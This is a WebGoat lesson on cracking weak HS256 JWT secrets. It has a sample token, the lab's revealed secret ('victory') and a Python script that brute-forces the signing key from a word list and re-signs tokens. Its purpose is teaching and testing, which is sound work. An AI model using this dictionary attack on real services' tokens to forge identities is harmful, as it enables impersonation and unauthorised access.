JWT Tokens (5)
JWT cracking
With the HMAC-with-SHA-2 algorithms (for example HS256) the same secret key both signs and verifies the token. Anyone who recovers this key can create a new token with arbitrary claims and give it a valid signature. It is therefore very important that the key is strong enough that a brute-force or dictionary attack is not feasible: once an attacker holds a single token, the search for the key is an offline brute-force or dictionary attack that needs no further interaction with the server.
Assignment
Given the following token, try to find out the secret key and submit a new token with the username changed to WebGoat.
eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTU5MDczNTQ3NiwiZXhwIjoxNTkwNzM1NTM2LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.28VXP4trt_uDrKM7Dn10ZotOhYoOhJy3dL-xu5boKzc
Solution
💡 Save the token and try to verify it locally.
💡 Download a word list dictionary (https://github.com/first20hours/google-10000-english).
💡 Write a small program, or use HashCat, to brute-force the token according to the word list.
It is possible to solve this challenge with tools like John the Ripper and https://jwt.io/, but in order to get a better understanding of the whole process, here is a Python script that does it step by step.
1. Isolate the signature (the third dot-separated segment) and restore the base64url padding so it decodes correctly.
2. Use each word of the dictionary as a key, calculate the HMAC-SHA256 of the initial message (header.payload), convert it to base64url, and compare it with the signature.
3. If there is a match, the dictionary word is the key used (value found: victory).
4. Then calculate the new signature with the modified message.
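The four steps above as an added Python script (not WebGoat's solution code). The token it checks, the weak secret `victory` and the short word list are constructed inline for the demonstration; run against your own issued tokens, a hit means the signing secret must be rotated to a long random value.

```python
import base64
import hashlib
import hmac
import json

# Constructed word list standing in for a downloaded dictionary file.
WORDLIST = ["password", "secret", "webgoat", "victory", "admin"]


def b64url_decode(s: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding (step 1).
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def hs256_token(header: dict, payload: dict, secret: bytes) -> str:
    """Issue an HS256 JWT: base64url(header).base64url(payload).base64url(HMAC)."""
    seg = lambda d: b64url_encode(json.dumps(d, separators=(",", ":")).encode())
    signing_input = f"{seg(header)}.{seg(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def find_weak_secret(token: str, wordlist):
    """Return the dictionary word that verifies the token's signature, or None.

    Only header.payload is signed, so every candidate key is tried against the
    same signing input (step 2); a match means the secret is in the word list
    and the token can be re-signed with modified claims (steps 3 and 4).
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("only HS256 tokens are checked here")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = b64url_decode(sig_b64)
    for word in wordlist:
        candidate = hmac.new(word.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(candidate, expected):
            return word
    return None


if __name__ == "__main__":
    header = {"alg": "HS256"}
    token = hs256_token(header, {"username": "Tom"}, b"victory")  # constructed weak secret
    print("weak secret found:", find_weak_secret(token, WORDLIST))
    # A long random secret (e.g. 32 bytes from os.urandom) is in no word list.
    strong = hs256_token(header, {"username": "Tom"}, b"x" * 32)
    print("strong secret found:", find_weak_secret(strong, WORDLIST))
```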